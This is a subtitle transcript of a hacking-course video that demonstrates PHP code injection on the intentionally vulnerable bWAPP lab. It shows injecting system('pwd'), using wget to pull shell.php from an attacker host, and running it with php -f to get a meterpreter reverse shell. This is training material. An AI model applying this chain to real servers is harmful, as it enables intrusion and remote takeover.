1
00:00:00,150 --> 00:00:02,250
Hello everybody and welcome back.

2
00:00:02,250 --> 00:00:07,440
And now before we continue to the next tutorial where I will actually show you some of the exploits

3
00:00:07,440 --> 00:00:10,550
that you can run on Metasploitable,

4
00:00:10,680 --> 00:00:15,240
let me just show you real quick what PHP code injection is. Now

5
00:00:15,270 --> 00:00:21,390
it is very similar to the previous lecture where we covered the OS command injection, but right now

6
00:00:21,510 --> 00:00:23,310
let us open the same page.

7
00:00:23,310 --> 00:00:31,770
So it is located on the bWAPP on our OWASP virtual machine. Go right here and find the PHP code

8
00:00:31,770 --> 00:00:32,600
injection.

9
00:00:32,790 --> 00:00:37,950
Once you click on that click here on hack, and here you have a simple page which basically just says

10
00:00:38,010 --> 00:00:41,280
this is just a test page reflecting back your message.

11
00:00:41,910 --> 00:00:47,730
So if you just click on the message it will say test. If you click on the message

12
00:00:47,730 --> 00:00:50,660
once again it will once again say test.

13
00:00:50,760 --> 00:00:57,700
Now you might be asking yourself, well there isn't any input right here which we can input our code.

14
00:00:57,750 --> 00:00:58,650
Well that's true.

15
00:00:58,650 --> 00:01:03,800
But if we actually try to intercept these with our burpsuite,

16
00:01:03,990 --> 00:01:10,450
so open up your burpsuite and click here on the intercept on. We want to have the intercept on.

17
00:01:10,470 --> 00:01:16,660
And once again if you click here on the message, it will show us a packet that we sent to the web server.

18
00:01:16,670 --> 00:01:24,990
Now it looks very normal until you notice that there is actually user input right here.

19
00:01:25,020 --> 00:01:30,450
So this is not something that you have a form to input on the website, but if you intercept the packet,

20
00:01:30,450 --> 00:01:32,600
you can actually input it right here.

21
00:01:32,610 --> 00:01:39,390
So what I mean by that. Right now since this is a PHP code injection we need to use a function, system,

22
00:01:40,020 --> 00:01:46,320
and then open up your brackets, and then let's type pwd, which is print working directory.

23
00:01:46,320 --> 00:01:48,690
So, we just type that right here.

24
00:01:48,690 --> 00:01:55,450
So system pwd, that is a function that will print our working directory. And when we forward this packet,

25
00:01:55,650 --> 00:02:02,490
wou will see that we no longer get the test as a result but we get the current working directory of

26
00:02:02,490 --> 00:02:06,390
that virtual machine, or basically of our OWASP virtual machine.

27
00:02:06,720 --> 00:02:12,690
And just like that we can now know that the server is vulnerable to the PHP code injection.

28
00:02:12,690 --> 00:02:18,540
So, what we can do from there, we can actually perform the same type of the attack as we performed in

29
00:02:18,540 --> 00:02:19,530
the previous video.

30
00:02:19,650 --> 00:02:25,500
So I will show you. If we click on the message once again and intercept the next packet,

31
00:02:25,560 --> 00:02:34,190
you can actually just download the shell.php the same way we downloaded it from in previous video.

32
00:02:34,200 --> 00:02:40,110
So what you would do...but in this case you would do a system first and then open up your brackets. And

33
00:02:40,110 --> 00:02:47,700
then type the same command, weget, 192.168.1.15. Or, basically, here you would

34
00:02:47,700 --> 00:02:54,300
specify your own IP address if you're running of course Apache on your Kali Linux machine. If

35
00:02:54,300 --> 00:02:58,680
you're running Apache 2 on some other machine, you will specify the IP address of that other machine

36
00:02:58,680 --> 00:03:06,690
that is hosting the Apache 2 with your shell.php file. And you also need to add /shell.php

37
00:03:06,690 --> 00:03:12,810
so it knows which file to download from there. And only what you need to do from there is close the

38
00:03:12,810 --> 00:03:15,570
quotes, and then close the brackets.

39
00:03:15,690 --> 00:03:20,690
Once you do that, you just need to forward this packet and this packet.

40
00:03:20,730 --> 00:03:26,370
And this basically will, let us just turn the intercept off, and what this will do is it will basically

41
00:03:26,430 --> 00:03:32,390
download the shell.php to the target machine, as it did in the previous video.

42
00:03:32,400 --> 00:03:34,000
So right now if I just type here

43
00:03:34,020 --> 00:03:46,620
ls once again, and I go right here, and then system open brackets, ls close quotes, close brackets,

44
00:03:46,620 --> 00:03:50,370
and then I forward it, same as in the previous video. Right now

45
00:03:50,400 --> 00:03:54,850
if I go right here we should be able to find the shell.php file.

46
00:03:55,230 --> 00:03:56,950
So here it is right here.

47
00:03:57,150 --> 00:04:03,870
We can see that we successfully uploaded the shell.php on to our target web server. And right now

48
00:04:03,870 --> 00:04:10,800
what you would do is basically just click on the message once again. And what you would do is type here

49
00:04:10,890 --> 00:04:17,310
system, and then the next thing you would do is basically php.

50
00:04:17,880 --> 00:04:25,350
So php -f and then shell.php. You will close the quotes, close the brackets, and then you will

51
00:04:25,350 --> 00:04:27,230
forward this packet as well.

52
00:04:27,240 --> 00:04:30,300
Now what this will do, this will basically,

53
00:04:30,390 --> 00:04:31,810
so let me just close this,

54
00:04:31,830 --> 00:04:37,350
this will basically connect to our own listening machine, which is our Kali Linux machine, and it will

55
00:04:37,350 --> 00:04:40,090
prompt us with our meterpreter shell.

56
00:04:40,140 --> 00:04:45,480
Now it won't connect since I didn't really open up my Metasploit framework, and didn't specify the

57
00:04:45,480 --> 00:04:45,850
LHOST

58
00:04:45,850 --> 00:04:50,280
and LPORT, and that exploit multi hander that we did in the previous video.

59
00:04:50,430 --> 00:04:52,730
So it really won't connect anywhere at the moment.

60
00:04:52,740 --> 00:04:58,270
But I just wanted to show you the exact same process that we did in the previous video just with the

61
00:04:58,320 --> 00:05:03,950
PHP code injection. If you want to try to exploit it you can do what I said with this. But before

62
00:05:03,950 --> 00:05:10,160
you run the program itself with the last command, which was the php -f and then the shell.php,

63
00:05:10,250 --> 00:05:14,210
you want to specify this listener in our Metasploit framework.

64
00:05:14,210 --> 00:05:18,920
Now the listener is the same as in the previous video,

65
00:05:19,340 --> 00:05:21,780
so I will not be covering that.

66
00:05:21,800 --> 00:05:27,110
Now in the next video what I will show you is how you can actually use some of the attacks and exploit

67
00:05:27,110 --> 00:05:29,790
Metasploitable. Since I can't really run Metasploitable,

68
00:05:29,790 --> 00:05:33,860
I will only show you the process to get to exploit it.

69
00:05:34,430 --> 00:05:39,530
I will not be really exploiting it since it doesn't work here.

70
00:05:39,530 --> 00:05:42,790
I hope you enjoyed this tutorial and I hope to see you in the next one.

71
00:05:42,890 --> 00:05:43,390
Bye!